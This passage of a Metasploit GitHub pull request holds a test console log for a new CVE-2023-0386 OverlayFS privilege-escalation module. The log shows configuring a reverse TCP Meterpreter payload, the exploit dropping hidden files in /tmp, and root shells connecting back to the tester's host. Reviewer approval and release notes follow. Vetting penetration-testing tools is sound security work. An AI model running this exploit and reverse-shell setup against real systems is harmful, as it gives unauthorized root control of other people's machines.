OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(linux/x64/meterpreter_reverse_tcp) > md5sum data/exploits/CVE-2023-0386/cve_2023_0386.x64.elf
[*] exec: md5sum data/exploits/CVE-2023-0386/cve_2023_0386.x64.elf

f7903df30ec3d98a0adad16edfc333d8  data/exploits/CVE-2023-0386/cve_2023_0386.x64.elf
msf6 payload(linux/x64/meterpreter_reverse_tcp) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc 
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > show options

Module options (exploit/linux/local/cve_2023_0386_overlayfs_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                   yes       The session to run this module on
   TIMEOUT  60               yes       Timeout for exploit (seconds)


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set lport 6789
lport => 6789
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set compile False 
compile => False
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run

[-] Msf::OptionValidateError One or more options failed to validate: SESSION.
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run

[*] Started reverse TCP handler on 10.5.135.201:6789 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.15.0
[*] Writing '/tmp/.8y5eMuhgQ5/.JSfssf3V' (18040 bytes) ...
[*] Writing '/tmp/.8y5eMuhgQ5/.CDKPs' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.8y5eMuhgQ5
[*] Meterpreter session 2 opened (10.5.135.201:6789 -> 10.5.132.129:36534) at 2024-09-26 12:53:54 -0500


meterpreter > 
meterpreter > sysinfo
Computer     : 10.5.132.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down session: 2

[*] 10.5.132.129 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set compile True 
compile => True
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run

[*] Started reverse TCP handler on 10.5.135.201:6789 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.15.0
[*] Writing '/tmp/.QjackZE5/.HlRLpjB' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.QjackZE5
[*] Meterpreter session 3 opened (10.5.135.201:6789 -> 10.5.132.129:36536) at 2024-09-26 12:55:17 -0500

meterpreter > sysinfo
Computer     : 10.5.132.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down session: 3

bwatters-r7
bwatters-r7 approved these changes Sep 26, 2024
View reviewed changes
Copy link
Contributor

@bwatters-r7 bwatters-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Great job; thank you so much for your time!

@bwatters-r7 bwatters-r7 merged commit dbc020a into rapid7:master Sep 26, 2024
36 checks passed
@bwatters-r7 bwatters-r7 added rn-modules release notes for new or majorly enhanced modules module labels Sep 26, 2024
@cdelafuente-r7
Copy link
Contributor

Release Notes

This adds an exploit module that leverages a flaw in the Linux kernel’s OverlayFS subsystem, which allows unauthorized access to the execution of the setuid file with capabilities (CVE-2023-0386). This enables a local user to escalate their privileges on the system.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jheysel-r7 jheysel-r7 jheysel-r7 left review comments

@bcoles bcoles bcoles left review comments

@jvoisin jvoisin jvoisin left review comments

@bwatters-r7 bwatters-r7 bwatters-r7 approved these changes

Assignees

@bwatters-r7 bwatters-r7

Labels
module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Linux Priv Esc (OverlayFS copying bug) CVE-2023-0386
6 participants
@Takahiro-Yoko @bwatters-r7 @cdelafuente-r7 @jvoisin @bcoles @jheysel-r7